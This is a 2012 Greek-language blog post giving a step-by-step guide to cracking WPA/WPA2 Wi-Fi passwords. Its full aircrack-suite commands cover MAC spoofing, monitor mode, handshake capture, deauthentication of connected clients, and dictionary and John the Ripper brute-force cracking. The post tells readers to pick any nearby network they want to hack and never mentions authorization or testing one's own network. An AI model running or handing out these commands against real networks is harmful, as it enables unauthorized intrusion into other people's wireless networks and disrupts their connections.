Blogger Widgets

Δευτέρα 13 Αυγούστου 2012

How to hack WPA/WPA2

1:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

2:
Now we will put the airodump-ng tool into monitor mode, this will allow us to see all of the wireless networks around us.

airodump-ng mon0

Now choose the network you want to hack and take note of the BSSID, and the Channel it is one as well as the ESSID. The PWR has to be fairly high to be able to hack it, this is determined by how close you are to the wireless router. The closer you are, the better. Once you have chosen the wireless network enter the following into the terminal: This will write capture packets and put them into the "filename" file, we are trying to capture the handshake between the router and wireless connection which will give us the key we need to crack.


3:
airodump-ng mon0 --channel * --bssid xx:xx:xx:xx:xx:xx -w filename

The following step is not necessarily but is highly recommended as it will speed up the process.
Once “WPA handshake: xx:xx:xx:xx:xx:xx” appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur then leave it and go to step 4.

4:
aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0

In this step you deauthorize a wireless connection and try to re-establish it so it will generate a new handshake to capture. This step ends when finally you have captured the handshake.

5:
aircrack-ng –w wordlist.lst -b xx:xx:xx:xx:xx:xx (ex.capturedkey_1.cap)

In step 5 you are now trying to crack the password in "capturedkey_1.cap"(in my case is "capturedkey_1.cap" you can use whatever you want) using a wordlist, which is also in my case called "wordlist.lst". Now you have to wait a lot of time for your computer to capture the password.

6:
If the password isn't found in the dictionary you can try and brute-force the password with this command: (Note this could take much more longer depending on their password strength).

/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b xx:xx:xx:xx:xx:xx -w - capturedkey.cap

Δεν υπάρχουν σχόλια:

Δημοσίευση σχολίου

IP widget
Έχετε συνδεθεί στην σελίδα πριν:

Δευτερόλ.
GRDriftKing